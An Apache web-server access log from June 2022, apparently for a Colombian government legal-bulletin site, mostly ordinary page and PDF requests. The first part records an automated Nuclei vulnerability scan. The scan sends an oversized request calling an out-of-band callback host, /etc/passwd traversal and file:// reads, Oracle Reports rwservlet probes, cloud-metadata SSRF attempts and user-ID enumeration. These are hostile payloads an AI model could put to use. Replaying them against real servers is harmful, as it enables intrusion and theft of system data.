46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://cac940fad3n9qrnu0kr0ckcjrteyyyyow.oast.live/ HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1" 404 1158
46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET /api/v4/users/41 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "POST /kindeditor/php/demo.php HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "POST /webmail/basic/ HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "POST /lib/crud/userprocess.php HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "GET /api/v4/users/42 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "POST /php/demo.php HTTP/1.1" 404 1032
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "GET /api/v4/users/43 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET /reports/rwservlet/showenv HTTP/1.1" 200 49494
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "GET /api/v4/users/44 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:43 -0500] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 200 466
46.101.1.185 - - [02/Jun/2022:05:37:44 -0500] "GET /api/v4/users/45 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:44 -0500] "GET /api/v4/users/46 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:44 -0500] "GET /api/v4/users/47 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:45 -0500] "GET /api/v4/users/48 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:45 -0500] "GET /api/v4/users/49 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:45 -0500] "GET /api/v4/users/50 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:46 -0500] "GET /api/v4/users/51 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:46 -0500] "GET /api/v4/users/52 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:46 -0500] "GET /api/v4/users/53 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:47 -0500] "GET /api/v4/users/54 HTTP/1.1" 404 1196
2.57.122.35 - - [02/Jun/2022:05:37:47 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:05:37:47 -0500] "GET /api/v4/users/55 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:47 -0500] "GET /api/v4/users/56 HTTP/1.1" 404 1196
46.101.1.185 - - [02/Jun/2022:05:37:47 -0500] "GET /api/v4/users/57 HTTP/1.1" 404 1196
172.22.2.4 - - [02/Jun/2022:05:37:48 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8292
46.101.1.185 - - [02/Jun/2022:05:37:48 -0500] "GET /api/v4/users/58 HTTP/1.1" 404 1196
172.22.2.4 - - [02/Jun/2022:05:38:00 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
46.101.1.185 - - [02/Jun/2022:05:37:41 -0500] "GET http://169.254.169.254/openstack/latest HTTP/1.1" 400 226
46.101.1.185 - - [02/Jun/2022:05:37:35 -0500] "GET http://aws.interact.sh/openstack/latest HTTP/1.1" 400 226
46.101.1.185 - - [02/Jun/2022:05:37:47 -0500] "GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1" 400 226
46.101.1.185 - - [02/Jun/2022:05:37:42 -0500] "GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1" 400 226
46.101.1.185 - - [02/Jun/2022:05:37:45 -0500] "GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1" 400 226
46.101.1.185 - - [02/Jun/2022:05:37:40 -0500] "GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1" 400 226
172.22.2.4 - - [02/Jun/2022:05:38:03 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [02/Jun/2022:05:38:04 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [02/Jun/2022:05:38:04 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [02/Jun/2022:05:38:07 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
216.245.221.92 - - [02/Jun/2022:05:38:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:05:39:18 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
172.22.2.4 - - [02/Jun/2022:05:38:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [02/Jun/2022:05:39:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [02/Jun/2022:05:40:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Jun/2022:05:42:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46595
172.22.2.4 - - [02/Jun/2022:05:41:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [02/Jun/2022:05:43:24 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Jun/2022:05:43:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44260
186.155.137.48 - - [02/Jun/2022:05:44:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.155.137.48 - - [02/Jun/2022:05:44:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.155.137.48 - - [02/Jun/2022:05:44:29 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
212.0.109.168 - - [02/Jun/2022:05:47:08 -0500] "GET /cgi-bin/printenv.pl HTTP/1.1" 200 1598
212.0.109.168 - - [02/Jun/2022:05:47:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
207.46.13.229 - - [02/Jun/2022:05:48:11 -0500] "-" 408 -
172.22.2.4 - - [02/Jun/2022:05:46:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Jun/2022:05:48:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:05:47:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
172.22.2.4 - - [02/Jun/2022:05:49:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
157.55.39.127 - - [02/Jun/2022:05:50:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4814.pdf HTTP/1.1" 200 409743
172.22.2.4 - - [02/Jun/2022:05:51:18 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 304 -
212.0.109.168 - - [02/Jun/2022:05:51:23 -0500] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 200 466
186.84.90.88 - - [02/Jun/2022:05:51:29 -0500] "GET /forest/ HTTP/1.1" 200 12041
212.0.109.168 - - [02/Jun/2022:05:51:46 -0500] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///errores.txt HTTP/1.1" 200 5297
216.245.221.92 - - [02/Jun/2022:05:53:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:05:52:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:05:53:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
40.77.167.79 - - [02/Jun/2022:05:58:17 -0500] "GET /galeria/galeria/fotos/17.jpg HTTP/1.1" 200 196674
216.245.221.92 - - [02/Jun/2022:05:58:24 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.43 - - [02/Jun/2022:05:58:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1016.pdf HTTP/1.1" 304 -
186.84.90.88 - - [02/Jun/2022:05:58:37 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
172.22.2.4 - - [02/Jun/2022:05:58:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.14 - - [02/Jun/2022:06:00:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 631529
157.55.39.8 - - [02/Jun/2022:06:00:40 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2008%2F HTTP/1.1" 200 749515
172.22.2.4 - - [02/Jun/2022:05:59:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54933
207.46.13.14 - - [02/Jun/2022:06:01:06 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 45065
207.46.13.14 - - [02/Jun/2022:06:00:16 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 60175
216.245.221.92 - - [02/Jun/2022:06:03:24 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.215 - - [02/Jun/2022:06:04:38 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/El-Tunjo-B-133x75.jpg HTTP/1.1" 200 3963
172.22.2.4 - - [02/Jun/2022:06:04:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:05:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
172.22.2.4 - - [02/Jun/2022:06:06:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-596-10.doc HTTP/1.1" 304 -
216.245.221.92 - - [02/Jun/2022:06:08:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:10:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.127 - - [02/Jun/2022:06:12:20 -0500] "GET /bla/resoluciones/autos%202008/2100.pdf HTTP/1.1" 200 132797
157.55.39.127 - - [02/Jun/2022:06:12:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Jun/2022:06:10:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
35.204.107.227 - - [02/Jun/2022:06:12:34 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [02/Jun/2022:06:13:24 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.102 - - [02/Jun/2022:06:13:31 -0500] "-" 408 -
172.22.2.4 - - [02/Jun/2022:06:15:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:16:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [02/Jun/2022:06:18:24 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Jun/2022:06:22:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46465
172.22.2.4 - - [02/Jun/2022:06:21:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Jun/2022:06:23:24 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Jun/2022:06:23:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44286
172.22.2.4 - - [02/Jun/2022:06:22:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
69.171.249.16 - - [02/Jun/2022:06:24:28 -0500] "GET /images/mujeres-cultura-31.jpg HTTP/1.1" 200 33736
216.245.221.92 - - [02/Jun/2022:06:28:24 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.6 - - [02/Jun/2022:06:28:58 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html HTTP/1.1" 206 796
173.252.107.11 - - [02/Jun/2022:06:28:58 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html HTTP/1.1" 206 796
173.252.107.3 - - [02/Jun/2022:06:29:03 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html HTTP/1.1" 206 796
173.252.107.4 - - [02/Jun/2022:06:29:03 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html HTTP/1.1" 206 796
173.252.127.10 - - [02/Jun/2022:06:29:03 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html?fbclid=IwAR16iBHwT3ndKuMHZwZqIXFBdxie9rmZTDVcI2wpHgbUhDkawYAiNnvI_nI HTTP/1.1" 200 796
172.22.2.4 - - [02/Jun/2022:06:27:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
